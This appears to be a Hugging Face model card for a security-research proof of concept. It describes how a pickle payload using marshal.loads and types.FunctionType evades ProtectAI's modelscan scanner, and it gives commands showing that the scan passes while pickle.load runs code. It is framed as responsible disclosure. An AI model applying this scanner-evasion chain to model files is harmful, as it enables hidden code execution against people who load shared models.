Hugging Face's logo

manja316
/
modelscan-marshal-bypass

PyTorch
security-research
proof-of-concept
Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

Modelscan Bypass PoC β€” marshal.loads + types.FunctionType

Security Research β€” Authorized Vulnerability Disclosure

This model file demonstrates a bypass of ProtectAI's modelscan scanner. The pickle payload uses marshal.loads() and types.FunctionType() to achieve code execution. Neither module is in modelscan's blocklist.

Bypass Chain

  1. marshal.loads(bytes) β†’ reconstructs code object from marshaled bytecode
  2. types.FunctionType(code_obj, {}) β†’ creates callable function
  3. func() β†’ executes embedded code

Impact

  • modelscan reports "No issues found" for this file
  • torch.load() or pickle.load() executes arbitrary code

PoC Verification 

modelscan scan -p pytorch_model.bin  # -> No issues found
python3 -c "import pickle; pickle.load(open('pytorch_model.bin', 'rb'))"  # -> RCE

Responsible Disclosure

Submitted to ProtectAI via Huntr MFV program.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support